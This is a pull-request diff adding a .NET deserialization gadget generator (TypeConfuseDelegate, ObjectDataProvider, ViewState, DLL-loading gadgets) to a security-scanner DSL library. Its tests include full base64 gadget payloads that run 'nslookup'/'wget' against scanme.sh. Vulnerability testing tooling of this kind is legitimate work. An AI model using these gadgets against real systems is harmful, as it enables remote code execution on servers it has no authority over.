Merge pull request #282 from projectdiscovery/add-dotnet-deserialization-helpers

feat: added support for dotnet deserialization gadget generation

Author: Ice3man543

deserialization/dotnet_deserialization.go

@@ -0,0 +1,202 @@
+package deserialization
+
+import (
+	"bytes"
+	"compress/gzip"
+	"encoding/base64"
+	"encoding/hex"
+	"strings"
+
+	"github.com/vulncheck-oss/go-exploit/dotnet"
+)
+
+// GenerateDotNetGadget generates a .NET deserialization gadget with a command/URL, formatter and encoding.
+//
+// Gadgets (Command-based): windows-identity, claims-principal, dataset, dataset-type-spoof, object-data-provider, text-formatting-runproperties, type-confuse-delegate
+// Gadgets (URL-based): object-ref, veeam-crypto-keyinfo
+// Gadgets (XML-based): dataset-xmldiffgram
+// Gadgets (DLL-based): axhost-state-dll, dll-reflection
+// Gadgets (ViewState): viewstate - format: "base64_inner_payload:machineKey:generator"
+// Gadgets (Prebuilt): Any other name loads via ReadGadget
+//
+// Formatters: binary/binaryformatter (default), soap/soapformatter, soapwithexceptions/soap-exceptions, los/losformatter
+// Encodings: raw, hex, gzip, gzip-base64, base64-raw, default (URL-safe base64)
+func GenerateDotNetGadget(gadget, cmd, formatter, encoding string) string {
+	var payload string
+	var ok bool
+
+	if formatter == "" {
+		formatter = dotnet.BinaryFormatter
+	}
+
+	formatterStr := mapFormatter(formatter)
+
+	switch gadget {
+	case "windows-identity":
+		program, args := parseCommand(cmd)
+		payload, ok = dotnet.CreateWindowsIdentity(program, args, formatterStr)
+	case "claims-principal":
+		program, args := parseCommand(cmd)
+		payload, ok = dotnet.CreateClaimsPrincipal(program, args, formatterStr)
+	case "dataset":
+		program, args := parseCommand(cmd)
+		payload, ok = dotnet.CreateDataSet(program, args, formatterStr)
+	case "dataset-type-spoof":
+		program, args := parseCommand(cmd)
+		payload, ok = dotnet.CreateDataSetTypeSpoof(program, args, formatterStr)
+	case "dataset-xmldiffgram":
+		payload, ok = dotnet.CreateDataSetXMLDiffGram(cmd)
+	case "object-data-provider":
+		program, args := parseCommand(cmd)
+		payload, ok = dotnet.CreateObjectDataProvider(program, args, formatterStr)
+	case "text-formatting-runproperties":
+		program, args := parseCommand(cmd)
+		payload, ok = dotnet.CreateTextFormattingRunProperties(program, args, formatterStr)
+	case "type-confuse-delegate":
+		program, args := parseCommand(cmd)
+		payload, ok = dotnet.CreateTypeConfuseDelegate(program, args, formatterStr)
+	case "object-ref":
+		payload, ok = dotnet.CreateObjectRef(cmd, formatterStr)
+	case "veeam-crypto-keyinfo":
+		payload, ok = dotnet.CreateVeeamCryptoKeyInfo(cmd, formatterStr)
+	case "axhost-state-dll":
+		dllBytes := []byte(cmd)
+		if isBase64(cmd) {
+			decoded, err := base64.StdEncoding.DecodeString(cmd)
+			if err == nil {
+				dllBytes = decoded
+			}
+		}
+		payload, ok = dotnet.CreateAxHostStateDLL(dllBytes, formatterStr)
+	case "dll-reflection":
+		dllBytes := []byte(cmd)
+		if isBase64(cmd) {
+			decoded, err := base64.StdEncoding.DecodeString(cmd)
+			if err == nil {
+				dllBytes = decoded
+			}
+		}
+		payload, ok = dotnet.CreateDLLReflection(dllBytes, formatterStr)
+	case "viewstate":
+		parts := strings.SplitN(cmd, ":", 3)
+		if len(parts) != 3 {
+			return ""
+		}
+		// Decode base64-encoded inner payload (first part)
+		innerPayload := strings.TrimSpace(parts[0])
+		if isBase64(innerPayload) {
+			decoded, err := base64.StdEncoding.DecodeString(innerPayload)
+			if err != nil {
+				return ""
+			}
+			innerPayload = string(decoded)
+		}
+
+		// CreateViewstatePayload returns a base64-encoded string
+		viewStateBase64, success := dotnet.CreateViewstatePayload(innerPayload, strings.TrimSpace(parts[1]), strings.TrimSpace(parts[2]))
+		if !success {
+			return ""
+		}
+
+		// Decode back to raw bytes because dotnetEncodingHelper will handle encoding
+		decodedViewState, err := base64.StdEncoding.DecodeString(viewStateBase64)
+		if err != nil {
+			return ""
+		}
+		payload = string(decodedViewState)
+		ok = true
+	default:
+		gadgetBytes, err := dotnet.ReadGadget(gadget, formatterStr)
+		if err != nil {
+			return ""
+		}
+		payload = string(gadgetBytes)
+		ok = true
+	}
+
+	if !ok {
+		return ""
+	}
+
+	return dotnetEncodingHelper([]byte(payload), encoding)
+}
+
+// parseCommand splits a command string into program and arguments.
+// Wraps with "cmd /c" unless program is cmd/powershell/pwsh.
+func parseCommand(cmd string) (string, string) {
+	if cmd == "" {
+		return "", ""
+	}
+
+	parts := strings.SplitN(cmd, " ", 2)
+	if len(parts) == 1 {
+		return "cmd", "/c " + cmd
+	}
+
+	program := parts[0]
+	if program == "cmd" || program == "powershell" || program == "pwsh" {
+		return program, parts[1]
+	}
+
+	return "cmd", "/c " + cmd
+}
+
+// mapFormatter maps user-friendly formatter names to dotnet package constants.
+// Supports: binary/binaryformatter, soap/soapformatter, soapwithexceptions/soap-exceptions, los/losformatter.
+func mapFormatter(formatter string) string {
+	switch strings.ToLower(formatter) {
+	case "binary", "binaryformatter":
+		return dotnet.BinaryFormatter
+	case "soap", "soapformatter":
+		return dotnet.SOAPFormatter
+	case "soapwithexceptions", "soap-exceptions":
+		return dotnet.SOAPFormatterWithExceptions
+	case "los", "losformatter":
+		return dotnet.LOSFormatter
+	case "":
+		return ""
+	default:
+		return formatter
+	}
+}
+
+// isBase64 checks if a string is valid base64.
+// Auto-detects base64-encoded DLL payloads.
+func isBase64(s string) bool {
+	if len(s) < 4 {
+		return false
+	}
+	_, err := base64.StdEncoding.DecodeString(s)
+	return err == nil
+}
+
+// dotnetEncodingHelper performs encoding of the generated gadget based on provided options.
+// Supports: raw, hex, gzip, gzip-base64, base64-raw, default (URL-safe base64).
+func dotnetEncodingHelper(returnData []byte, encoding string) string {
+	switch encoding {
+	case "raw":
+		return string(returnData)
+	case "hex":
+		return hex.EncodeToString(returnData)
+	case "gzip":
+		buffer := &bytes.Buffer{}
+		writer := gzip.NewWriter(buffer)
+		if _, err := writer.Write(returnData); err != nil {
+			return ""
+		}
+		_ = writer.Close()
+		return buffer.String()
+	case "gzip-base64":
+		buffer := &bytes.Buffer{}
+		writer := gzip.NewWriter(buffer)
+		if _, err := writer.Write(returnData); err != nil {
+			return ""
+		}
+		_ = writer.Close()
+		return urlsafeBase64Encode(buffer.Bytes())
+	case "base64-raw":
+		return base64.StdEncoding.EncodeToString(returnData)
+	default:
+		return urlsafeBase64Encode(returnData)
+	}
+}

dsl.go

@@ -983,6 +983,14 @@ func init() {
 		data := deserialization.GenerateJavaGadget(gadget, cmd, encoding)
 		return data, nil
 	}))
+	MustAddFunction(NewWithPositionalArgs("generate_dotnet_gadget", 4, true, func(args ...interface{}) (interface{}, error) {
+		gadget := args[0].(string)
+		cmd := args[1].(string)
+		formatter := args[2].(string)
+		encoding := args[3].(string)
+		data := deserialization.GenerateDotNetGadget(gadget, cmd, formatter, encoding)
+		return data, nil
+	}))
 	MustAddFunction(NewWithSingleSignature("unix_time",
 		"(optionalSeconds uint) float64",
 		false,

dsl_test.go

@@ -254,6 +254,7 @@ func TestGetPrintableDslFunctionSignatures(t *testing.T) {
 	deflate(arg1 interface{}) interface{}
 	ends_with(str string, suffix ...string) bool
 	equals_any(s interface{}, subs ...interface{}) bool
+	generate_dotnet_gadget(arg1, arg2, arg3, arg4 interface{}) interface{}
 	generate_java_gadget(arg1, arg2, arg3 interface{}) interface{}
 	generate_jwt(jsonString, algorithm, optionalSignature string, optionalMaxAgeUnix interface{}) string
 	gzip(arg1 interface{}) interface{}
@@ -398,9 +399,10 @@ func TestDslExpressions(t *testing.T) {
 		`deflate("Hello")`:                              "\xf2\x48\xcd\xc9\xc9\x07\x04\x00\x00\xff\xff",
 		`inflate(hex_decode("f348cdc9c90700"))`:         "Hello",
 		`inflate(hex_decode("f248cdc9c907040000ffff"))`: "Hello",
-		`gzip_decode(hex_decode("1f8b08000000000000fff248cdc9c907040000ffff8289d1f705000000"))`: "Hello",
-		`generate_java_gadget("commons-collections3.1", "wget http://scanme.sh", "base64")`:     "rO0ABXNyABFqYXZhLnV0aWwuSGFzaFNldLpEhZWWuLc0AwAAeHB3DAAAAAI/QAAAAAAAAXNyADRvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMua2V5dmFsdWUuVGllZE1hcEVudHJ5iq3SmznBH9sCAAJMAANrZXl0ABJMamF2YS9sYW5nL09iamVjdDtMAANtYXB0AA9MamF2YS91dGlsL01hcDt4cHQAJmh0dHBzOi8vZ2l0aHViLmNvbS9qb2FvbWF0b3NmL2pleGJvc3Mgc3IAKm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5tYXAuTGF6eU1hcG7llIKeeRCUAwABTAAHZmFjdG9yeXQALExvcmcvYXBhY2hlL2NvbW1vbnMvY29sbGVjdGlvbnMvVHJhbnNmb3JtZXI7eHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkNoYWluZWRUcmFuc2Zvcm1lcjDHl%2BwoepcEAgABWwANaVRyYW5zZm9ybWVyc3QALVtMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5zZm9ybWVyO3hwdXIALVtMb3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLlRyYW5zZm9ybWVyO71WKvHYNBiZAgAAeHAAAAAFc3IAO29yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5Db25zdGFudFRyYW5zZm9ybWVyWHaQEUECsZQCAAFMAAlpQ29uc3RhbnRxAH4AA3hwdnIAEWphdmEubGFuZy5SdW50aW1lAAAAAAAAAAAAAAB4cHNyADpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuSW52b2tlclRyYW5zZm9ybWVyh%2Bj/a3t8zjgCAANbAAVpQXJnc3QAE1tMamF2YS9sYW5nL09iamVjdDtMAAtpTWV0aG9kTmFtZXQAEkxqYXZhL2xhbmcvU3RyaW5nO1sAC2lQYXJhbVR5cGVzdAASW0xqYXZhL2xhbmcvQ2xhc3M7eHB1cgATW0xqYXZhLmxhbmcuT2JqZWN0O5DOWJ8QcylsAgAAeHAAAAACdAAKZ2V0UnVudGltZXVyABJbTGphdmEubGFuZy5DbGFzczurFteuy81amQIAAHhwAAAAAHQACWdldE1ldGhvZHVxAH4AGwAAAAJ2cgAQamF2YS5sYW5nLlN0cmluZ6DwpDh6O7NCAgAAeHB2cQB%2BABtzcQB%2BABN1cQB%2BABgAAAACcHVxAH4AGAAAAAB0AAZpbnZva2V1cQB%2BABsAAAACdnIAEGphdmEubGFuZy5PYmplY3QAAAAAAAAAAAAAAHhwdnEAfgAYc3EAfgATdXIAE1tMamF2YS5sYW5nLlN0cmluZzut0lbn6R17RwIAAHhwAAAAAXQAFXdnZXQgaHR0cDovL3NjYW5tZS5zaHQABGV4ZWN1cQB%2BABsAAAABcQB%2BACBzcQB%2BAA9zcgARamF2YS5sYW5nLkludGVnZXIS4qCk94GHOAIAAUkABXZhbHVleHIAEGphdmEubGFuZy5OdW1iZXKGrJUdC5TgiwIAAHhwAAAAAXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAB3CAAAABAAAAAAeHh4",
-		`generate_jwt("{\"name\":\"John Doe\",\"foo\":\"bar\"}", "HS256", "hello-world")`:       []byte("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmb28iOiJiYXIiLCJuYW1lIjoiSm9obiBEb2UifQ.EsrL8lIcYJR_Ns-JuhF3VCllCP7xwbpMCCfHin_WT6U"),
+		`gzip_decode(hex_decode("1f8b08000000000000fff248cdc9c907040000ffff8289d1f705000000"))`:                           "Hello",
+		`generate_dotnet_gadget("type-confuse-delegate", "cmd.exe /C nslookup http://scanme.sh", "binary", "base64-raw")`: "AAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19jb21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAAAAGBgAAACcvYyBjbWQuZXhlIC9DIG5zbG9va3VwIGh0dHA6Ly9zY2FubWUuc2gGBwAAAANjbWQEBQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCQgAAAAJCQAAAAkKAAAABAgAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGCwAAALACU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsIFN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQYMAAAAS21zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQoGDQAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5Bg4AAAAaU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MGDwAAAAVTdGFydAkQAAAABAkAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIHAAAABE5hbWUMQXNzZW1ibHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKU2lnbmF0dXJlMgpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAQADCA1TeXN0ZW0uVHlwZVtdCQ8AAAAJDQAAAAkOAAAABhQAAAA+U3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGFQAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKAQoAAAAJAAAABhYAAAAHQ29tcGFyZQkMAAAABhgAAAANU3lzdGVtLlN0cmluZwYZAAAAK0ludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGGgAAADJTeXN0ZW0uSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKARAAAAAIAAAABhsAAABxU3lzdGVtLkNvbXBhcmlzb25gMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JDAAAAAoJDAAAAAkYAAAACRYAAAAKCw==",
+		`generate_java_gadget("commons-collections3.1", "wget http://scanme.sh", "base64")`:                               "rO0ABXNyABFqYXZhLnV0aWwuSGFzaFNldLpEhZWWuLc0AwAAeHB3DAAAAAI/QAAAAAAAAXNyADRvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMua2V5dmFsdWUuVGllZE1hcEVudHJ5iq3SmznBH9sCAAJMAANrZXl0ABJMamF2YS9sYW5nL09iamVjdDtMAANtYXB0AA9MamF2YS91dGlsL01hcDt4cHQAJmh0dHBzOi8vZ2l0aHViLmNvbS9qb2FvbWF0b3NmL2pleGJvc3Mgc3IAKm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5tYXAuTGF6eU1hcG7llIKeeRCUAwABTAAHZmFjdG9yeXQALExvcmcvYXBhY2hlL2NvbW1vbnMvY29sbGVjdGlvbnMvVHJhbnNmb3JtZXI7eHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkNoYWluZWRUcmFuc2Zvcm1lcjDHl%2BwoepcEAgABWwANaVRyYW5zZm9ybWVyc3QALVtMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5zZm9ybWVyO3hwdXIALVtMb3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLlRyYW5zZm9ybWVyO71WKvHYNBiZAgAAeHAAAAAFc3IAO29yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5Db25zdGFudFRyYW5zZm9ybWVyWHaQEUECsZQCAAFMAAlpQ29uc3RhbnRxAH4AA3hwdnIAEWphdmEubGFuZy5SdW50aW1lAAAAAAAAAAAAAAB4cHNyADpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuSW52b2tlclRyYW5zZm9ybWVyh%2Bj/a3t8zjgCAANbAAVpQXJnc3QAE1tMamF2YS9sYW5nL09iamVjdDtMAAtpTWV0aG9kTmFtZXQAEkxqYXZhL2xhbmcvU3RyaW5nO1sAC2lQYXJhbVR5cGVzdAASW0xqYXZhL2xhbmcvQ2xhc3M7eHB1cgATW0xqYXZhLmxhbmcuT2JqZWN0O5DOWJ8QcylsAgAAeHAAAAACdAAKZ2V0UnVudGltZXVyABJbTGphdmEubGFuZy5DbGFzczurFteuy81amQIAAHhwAAAAAHQACWdldE1ldGhvZHVxAH4AGwAAAAJ2cgAQamF2YS5sYW5nLlN0cmluZ6DwpDh6O7NCAgAAeHB2cQB%2BABtzcQB%2BABN1cQB%2BABgAAAACcHVxAH4AGAAAAAB0AAZpbnZva2V1cQB%2BABsAAAACdnIAEGphdmEubGFuZy5PYmplY3QAAAAAAAAAAAAAAHhwdnEAfgAYc3EAfgATdXIAE1tMamF2YS5sYW5nLlN0cmluZzut0lbn6R17RwIAAHhwAAAAAXQAFXdnZXQgaHR0cDovL3NjYW5tZS5zaHQABGV4ZWN1cQB%2BABsAAAABcQB%2BACBzcQB%2BAA9zcgARamF2YS5sYW5nLkludGVnZXIS4qCk94GHOAIAAUkABXZhbHVleHIAEGphdmEubGFuZy5OdW1iZXKGrJUdC5TgiwIAAHhwAAAAAXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAB3CAAAABAAAAAAeHh4",
+		`generate_jwt("{\"name\":\"John Doe\",\"foo\":\"bar\"}", "HS256", "hello-world")`:                                 []byte("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmb28iOiJiYXIiLCJuYW1lIjoiSm9obiBEb2UifQ.EsrL8lIcYJR_Ns-JuhF3VCllCP7xwbpMCCfHin_WT6U"),
 		`base64_decode("SGVsbG8=")`:                               "Hello",
 		`hex_decode("6161")`:                                      "aa",
 		`len("Hello")`:                                            float64(5),

go.mod

@@ -1,6 +1,8 @@
 module github.com/projectdiscovery/dsl
 
-go 1.24.0
+go 1.24.1
+
+toolchain go1.24.2
 
 require (
 	github.com/Knetic/govaluate v3.0.0+incompatible
@@ -20,8 +22,9 @@ require (
 	github.com/sashabaranov/go-openai v1.37.0
 	github.com/spaolacci/murmur3 v1.1.0
 	github.com/stretchr/testify v1.11.1
-	golang.org/x/exp v0.0.0-20250106191152-7588d65b2ba8
-	golang.org/x/text v0.24.0
+	github.com/vulncheck-oss/go-exploit v1.51.0
+	golang.org/x/exp v0.0.0-20250620022241-b7579e27df2b
+	golang.org/x/text v0.31.0
 )
 
 require (
@@ -61,11 +64,11 @@ require (
 	github.com/xdg-go/pbkdf2 v1.0.0 // indirect
 	go.uber.org/multierr v1.11.0 // indirect
 	go4.org v0.0.0-20230225012048-214862532bf5 // indirect
-	golang.org/x/mod v0.22.0 // indirect
-	golang.org/x/net v0.39.0 // indirect
-	golang.org/x/sync v0.13.0 // indirect
-	golang.org/x/sys v0.32.0 // indirect
-	golang.org/x/tools v0.29.0 // indirect
+	golang.org/x/mod v0.29.0 // indirect
+	golang.org/x/net v0.47.0 // indirect
+	golang.org/x/sync v0.18.0 // indirect
+	golang.org/x/sys v0.38.0 // indirect
+	golang.org/x/tools v0.38.0 // indirect
 	gopkg.in/djherbis/times.v1 v1.3.0 // indirect
 	gopkg.in/yaml.v3 v3.0.1 // indirect
 )